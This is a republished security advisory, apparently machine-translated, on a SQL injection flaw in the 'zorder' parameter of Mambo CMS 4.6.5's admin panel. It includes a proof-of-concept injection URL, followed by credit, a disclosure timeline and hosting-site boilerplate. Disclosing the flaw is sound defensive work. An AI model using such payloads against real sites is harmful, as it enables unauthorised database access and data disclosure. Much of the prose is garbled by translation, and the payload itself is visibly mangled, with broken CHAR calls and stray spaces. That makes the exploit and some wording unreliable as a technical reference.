Mambo CMS 4.6.x (4.6.5) SQL Injection defects and repair

Source: Internet
Author: User

========================================================== =
Mambo CMS 4.6.x (4.6.5) | SQL Injection
========================================================== =


1. Overview

Mambo CMS 4.6.5 and earlier versions contain injection Defects


2. Background

Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex reset ate applications. it is used all over the world to power government portals, transferate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. mambo's "power in simplicity" also makes it the CMS of choice for processing small businesses and personal sites.


3. defect description

The "zorder" parameter was not properly sanitized upon submission to the administrator/index2.php url, which allows attacker to conduct SQL Injection attack. this coshould an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.


4. Affected Versions

Mambo CMS 4.6.5 tested


5. PROOF-OF-CONCEPT/EXPLOIT

Http://www.bkjia.com/mambo/administrator/index2.php? Limit = 10 & order [] = 11 & boxchecked = 0 & toggle = on & search = sqli & task = & limitstart = 0 & cid [] = on & zorder =-1 OR (SELECT 9999 FROM (select count (*), CONCAT (CHAR (112,101, 9999, 58), (SELECT (case when (9999 = 58,110,100,107) THEN 1 ELSE 0 END), CHAR (, 58 ), FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x) a) & filter_authorid = 62 & hidemainmenu = 0 & option = com_typedcontent


6. SOLUTION

The vendor seems to discontinue the development. It is recommended to use another CMS in active development.


7. VENDOR

Mambo CMS Development Team
Http://mambo-developer.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. disclosure time-LINE

2010-11-31: notified vendor through bug tracker
2011-08-12: no patched version released up to date
2011-08-12: vulnerability disclosed


10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/?mambo4.6_x=_ SQL _injection
Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip


# Yehg [2011-08-12]

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.